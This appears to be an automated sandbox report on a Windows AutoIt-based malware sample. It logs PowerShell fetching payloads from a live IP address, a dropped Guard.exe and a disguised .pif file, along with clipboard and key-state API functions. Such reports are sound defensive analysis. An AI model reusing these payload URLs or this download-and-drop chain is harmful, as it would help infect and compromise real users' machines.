00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global trafficHTTP traffic detected: GET /ucZfzm.txt HTTP/1.1Host: 139.99.188.124Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 139.99.188.124 139.99.188.124
Source: Joe Sandbox ViewIP Address: 139.99.188.124 139.99.188.124
Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
Source: unknownDNS traffic detected: query: nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs replaycode: Name error (3)
Source: global trafficHTTP traffic detected: GET /aiSMo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 139.99.188.124Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1CE968 InternetQueryDataAvailable,InternetReadFile,0_2_00007FF75F1CE968
Source: global trafficHTTP traffic detected: GET /aiSMo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 139.99.188.124Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ucZfzm.txt HTTP/1.1Host: 139.99.188.124Connection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
Source: powershell.exe, 00000003.00000002.1792733359.000001E2B4810000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1792733359.000001E2B36D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.99.188.124
Source: EO3RT0fEfb.exe, 00000000.00000002.1741781373.0000020B9F862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://139.99.188.124/aiSMo
Source: powershell.exe, 00000003.00000002.1792733359.000001E2B36D8000.00000004.00000800.00020000.00000000.sdmp, PublicProfile.ps1.0.drString found in binary or memory: http://139.99.188.124/ucZfzm.txt
Source: powershell.exe, 00000003.00000002.1792733359.000001E2B4AD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.99.HB
Source: Guard.exe, 00000005.00000003.1808485987.000000000511E000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000005.00000002.2929941093.000000000439B000.00000004.00000020.00020000.00000000.sdmp, Guard.exe.1.dr, SwiftWrite.pif.5.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Guard.exe, 00000005.00000003.1808485987.000000000511E000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000005.00000002.2929941093.000000000439B000.00000004.00000020.00020000.00000000.sdmp, Guard.exe.1.dr, SwiftWrite.pif.5.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Guard.exe, 00000005.00000003.1808485987.000000000511E000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000005.00000002.2929941093.000000000439B000.00000004.00000020.00020000.00000000.sdmp, Guard.exe.1.dr, SwiftWrite.pif.5.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Guard.exe, 00000005.00000003.1808485987.000000000511E000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000005.00000002.2929941093.000000000439B000.00000004.00000020.00020000.00000000.sdmp, Guard.exe.1.dr, SwiftWrite.pif.5.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: powershell.exe, 00000003.00000002.1821309242.000001E2CBC7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
Source: powershell.exe, 00000003.00000002.1792733359.000001E2B4DB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1809768933.000001E2C3525000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: Guard.exe, 00000005.00000003.1808485987.000000000511E000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000005.00000002.2929941093.000000000439B000.00000004.00000020.00020000.00000000.sdmp, Guard.exe.1.dr, SwiftWrite.pif.5.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Guard.exe, 00000005.00000003.1808485987.000000000511E000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000005.00000002.2929941093.000000000439B000.00000004.00000020.00020000.00000000.sdmp, Guard.exe.1.dr, SwiftWrite.pif.5.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Guard.exe, 00000005.00000003.1808485987.000000000511E000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000005.00000002.2929941093.000000000439B000.00000004.00000020.00020000.00000000.sdmp, Guard.exe.1.dr, SwiftWrite.pif.5.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: powershell.exe, 00000003.00000002.1792733359.000001E2B4D28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.1792733359.000001E2B34B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Guard.exe, 00000005.00000003.1808485987.000000000511E000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000005.00000002.2929941093.000000000439B000.00000004.00000020.00020000.00000000.sdmp, Guard.exe.1.dr, SwiftWrite.pif.5.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Guard.exe, 00000005.00000003.1808485987.000000000511E000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000005.00000002.2929941093.000000000439B000.00000004.00000020.00020000.00000000.sdmp, Guard.exe.1.dr, SwiftWrite.pif.5.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: powershell.exe, 00000003.00000002.1792733359.000001E2B4B06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000003.00000002.1792733359.000001E2B4D28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Guard.exe, 00000005.00000003.1808485987.000000000511E000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000005.00000002.2928023536.0000000000BC9000.00000002.00000001.01000000.00000007.sdmp, SwiftWrite.pif, 0000000C.00000000.1918927211.0000000000319000.00000002.00000001.01000000.00000009.sdmp, Guard.exe.1.dr, SwiftWrite.pif.5.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: powershell.exe, 00000003.00000002.1792733359.000001E2B34B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000003.00000002.1809768933.000001E2C3525000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.1809768933.000001E2C3525000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.1809768933.000001E2C3525000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.1792733359.000001E2B4D28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1792733359.000001E2B45F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.1792733359.000001E2B4DB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1809768933.000001E2C3525000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000003.00000002.1792733359.000001E2B4B06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000003.00000002.1792733359.000001E2B4B06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: Guard.exe, 00000005.00000003.1808485987.000000000511E000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000005.00000002.2929941093.000000000439B000.00000004.00000020.00020000.00000000.sdmp, Guard.exe.1.dr, SwiftWrite.pif.5.drString found in binary or memory: https://www.autoitscript.com/autoit3/
Source: SwiftWrite.pif.5.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: Guard.exe, 00000005.00000003.1808485987.000000000511E000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000005.00000002.2929941093.000000000439B000.00000004.00000020.00020000.00000000.sdmp, Guard.exe.1.dr, SwiftWrite.pif.5.drString found in binary or memory: https://www.globalsign.com/repository/06
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1D0D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00007FF75F1D0D24
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1D0D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00007FF75F1D0D24
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B74830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_00B74830
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002C4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,12_2_002C4830
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1D0A6C OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00007FF75F1D0A6C
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1B7E64 GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00007FF75F1B7E64
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B8D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,5_2_00B8D164
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002DD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,12_2_002DD164

System Summary

barindex
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: This is a third-party compiled AutoIt script.0_2_00007FF75F1437B0
Source: EO3RT0fEfb.exeString found in binary or memory: This is a third-party compiled AutoIt script.
Source: EO3RT0fEfb.exe, 00000000.00000000.1683576822.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e5a37f4f-0
Source: EO3RT0fEfb.exe, 00000000.00000000.1683576822.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*memstr_390749a9-0
Source: EO3RT0fEfb.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f7fb8c3b-f
Source: EO3RT0fEfb.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*memstr_4d849b43-0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1BC054: CreateFileW,DeviceIoControl,CloseHandle,0_2_00007FF75F1BC054
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1AD2C4 GetCurrentProcess,OpenProcessToken,CreateEnvironmentBlock,CloseHandle,CreateProcessWithLogonW,DestroyEnvironmentBlock,0_2_00007FF75F1AD2C4
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1BD750 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00007FF75F1BD750
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B65778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,5_2_00B65778
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002B5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,12_2_002B5778
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1DF6300_2_00007FF75F1DF630
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1D206C0_2_00007FF75F1D206C
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F145F3C0_2_00007FF75F145F3C
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F14BE700_2_00007FF75F14BE70
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F16BEB40_2_00007FF75F16BEB4
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F153C200_2_00007FF75F153C20
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1EDB180_2_00007FF75F1EDB18
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F15FA4F0_2_00007FF75F15FA4F
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1C1A180_2_00007FF75F1C1A18
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F17793C0_2_00007FF75F17793C
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1EBA0C0_2_00007FF75F1EBA0C
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F14B9F00_2_00007FF75F14B9F0
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F14183C0_2_00007FF75F14183C
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1818400_2_00007FF75F181840
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1BD87C0_2_00007FF75F1BD87C
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1558D00_2_00007FF75F1558D0
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F16F8D00_2_00007FF75F16F8D0
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1717500_2_00007FF75F171750
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1F17C00_2_00007FF75F1F17C0
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1D56A00_2_00007FF75F1D56A0
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1795B00_2_00007FF75F1795B0
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F14B3900_2_00007FF75F14B390
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F18529C0_2_00007FF75F18529C
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1D32AC0_2_00007FF75F1D32AC
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1730DC0_2_00007FF75F1730DC
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F152E300_2_00007FF75F152E30
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1ECE8C0_2_00007FF75F1ECE8C
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F160E900_2_00007FF75F160E90
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F150E700_2_00007FF75F150E70
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F182D200_2_00007FF75F182D20
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F186DE40_2_00007FF75F186DE4
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1D6C340_2_00007FF75F1D6C34
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F142AE00_2_00007FF75F142AE0
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1E0AEC0_2_00007FF75F1E0AEC
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F17A8A00_2_00007FF75F17A8A0
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1867F00_2_00007FF75F1867F0
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1EC6D40_2_00007FF75F1EC6D4
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1E055C0_2_00007FF75F1E055C
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1EA59C0_2_00007FF75F1EA59C
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1784C00_2_00007FF75F1784C0
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1645140_2_00007FF75F164514
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1D63200_2_00007FF75F1D6320
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1D83600_2_00007FF75F1D8360
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1C83D40_2_00007FF75F1C83D4
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F16C3FC0_2_00007FF75F16C3FC
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1824000_2_00007FF75F182400
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1602C40_2_00007FF75F1602C4
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F16C1300_2_00007FF75F16C130
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B0B0205_2_00B0B020
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B094E05_2_00B094E0
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B09C805_2_00B09C80
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B223F55_2_00B223F5
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B884005_2_00B88400
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B365025_2_00B36502
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B0E6F05_2_00B0E6F0
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B3265E5_2_00B3265E
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B2282A5_2_00B2282A
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B389BF5_2_00B389BF
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B80A3A5_2_00B80A3A
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B36A745_2_00B36A74
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B10BE05_2_00B10BE0
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B5EDB25_2_00B5EDB2
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B2CD515_2_00B2CD51
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B80EB75_2_00B80EB7
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B68E445_2_00B68E44
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B36FE65_2_00B36FE6
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B233B75_2_00B233B7
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B2F4095_2_00B2F409
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B1D45D5_2_00B1D45D
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B216B45_2_00B216B4
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B0F6A05_2_00B0F6A0
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B1F6285_2_00B1F628
